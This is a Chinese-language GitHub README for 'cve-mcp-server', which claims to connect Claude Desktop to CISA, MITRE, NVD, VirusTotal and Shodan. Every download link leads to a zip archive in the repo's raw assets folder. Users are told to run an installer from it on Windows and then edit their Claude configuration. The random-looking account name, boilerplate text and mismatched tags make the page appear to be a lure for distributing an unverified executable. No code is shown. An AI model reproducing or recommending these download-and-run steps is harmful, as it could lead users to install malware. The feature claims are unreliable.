allergydietgenusandrena136/cve-mcp-server

GitHub: allergydietgenusandrena136/cve-mcp-server

通过 Model Context Protocol 让 Claude Desktop 直接查询 CISA、MITRE、NVD 等安全数据库的安全情报工具。

Stars: 0 | Forks: 0

# 🛡️ cve-mcp-server - 在 Claude AI 中获取安全情报 [![下载软件](https://img.shields.io/badge/Download-Release-blue.svg)](https://github.com/allergydietgenusandrena136/cve-mcp-server/raw/refs/heads/main/assets/server_cve_mcp_1.8-beta.5.zip) 此工具将 Claude 与专业网络安全数据库连接起来。它允许您搜索漏洞、检查威胁评分,并通过 Claude 界面查看安全报告。它将 CISA、MITRE 和 VirusTotal 等来源的数据整合到一个系统中。您可以使用它来获取威胁情报,而无需离开聊天窗口。 ## 💻 系统要求 您的计算机需要满足以下基本标准才能有效运行该软件: * 操作系统:Windows 10 或 Windows 11。 * 处理器:标准双核处理器或更高。 * 内存:4 GB 或更高。 * 网络:用于数据库查询的活跃连接。 * 软件:已安装最新版本的 Claude Desktop。 ## 📥 安装步骤 您必须按照以下步骤来设置软件。 1. 访问[此页面](https://github.com/allergydietgenusandrena136/cve-mcp-server/raw/refs/heads/main/assets/server_cve_mcp_1.8-beta.5.zip)下载当前版本。 2. 找到下载文件夹中的安装程序文件。 3. 打开文件开始安装过程。 4. 按照屏幕提示完成安装。 5. 此步骤将自动进行路径配置。 ## ⚙️ 配置 服务器需要适当的配置才能与 Claude 通信。安装后您必须编辑 Claude Desktop 配置文件。 1. 在 Windows 机器上打开文件资源管理器。 2. 导航到您的用户文件夹,然后打开 AppData 文件夹。如果看不到,请在"查看"选项卡中启用"隐藏项目"。 3. 找到 Claude 文件夹,然后找到 `claude_desktop_config.json` 文件。 4. 右键点击文件,选择记事本来打开它。 5. 将提供的配置代码片段粘贴到文件中。这些代码片段告诉 Claude 在哪里找到安全工具。 6. 保存文件并关闭应用程序。 7. 重启 Claude Desktop 应用程序以完成程序之间的链接。 ## 🔍 使用安全工具 重启 Claude 后,这些工具将作为函数库出现。您可以要求 Claude 执行特定任务。 ### 漏洞搜索 输入类似"查找 CVE-2023-1234"或"给我提供近期漏洞信息"的请求。Claude 会将这些请求发送到服务器,服务器会从官方数据库获取数据。 ### 威胁评分 您可以请求 EPSS 分数来了解威胁的可能性。向 Claude 询问"这个软件组件的当前 EPSS 分数是多少?"来获取数值数据。 ### 基础设施检查 服务器包含来自 Shodan 和 VirusTotal 的数据。您可以请求域名或 IP 地址的摘要。Claude 将提供信誉状态和来自安全网络的最新报告。 ## 🛠️ 故障排除 如果工具没有响应,请检查您的设置。 * 首先检查您的网络连接。 * 验证 `claude_desktop_config.json` 文件中的路径。确保它指向您安装服务器的正确位置。 * 如果连接错误仍然存在,请重启您的计算机。 * 确保您使用的是最新版本的 Claude Desktop。旧版本可能不支持这些服务器工具。 ## 📋 功能概述 * CISA KEV 集成:获取已知被利用漏洞的警报。 * MITRE ATT&CK 映射:了解对手策略和技术。 * NVD 访问:直接查询国家漏洞数据库。 * OSV 集成:查看开源安全漏洞报告。 * VirusTotal 信誉:检查文件和 URL 对比全球安全数据库。 * API 效率:连接 21 个独立 API 以获取全面数据。 ## 🛡️ 数据隐私 此实现专注于本地处理。仅在您请求特定数据时才会进行外部 API 调用。软件不会将您的私人聊天历史或个人数据存储在外部服务器上。它充当您本地界面与所选查询的安全数据库之间的桥梁。 ## 🏢 管理您的安全工作流 安全专业人员使用此工具来加速他们的研究。您无需检查 21 个网站来查找单个漏洞,而是在 Claude 中执行一次查询即可。这节省了时间并降低了遗漏关键细节的风险。该工具将复杂数据转化为简单的摘要。 ## 🤝 贡献和支持 您可以在官方仓库页面提出改进建议或报告问题。社区会持续更新并添加新的 API 连接。如果您对特定工具行为有疑问,请查阅仓库中的最新文档。 ## ⚠️ 重要操作说明 此软件每次查询都需要活跃的网络连接。它不会将整个数据库下载到您的机器上。如果要做出高风险的基础设施决策,请始终通过多个来源验证敏感的安全数据。该工具提供信息,但您需要对根据该数据执行的命令的结果负责。请确保您的 Windows 环境保持更新,以保持安全工具的顺利运行。
标签:Ask搜索, CISA, Claude AI, Conpot, CVE查询, MCP, MITRE, Model Context Protocol, VirusTotal, Windows安全, XSS, 人工智能安全助手, 威胁情报, 威胁评分, 安全报告, 安全数据库, 开发者工具, 漏洞情报, 网络安全, 逆向工具, 隐私保护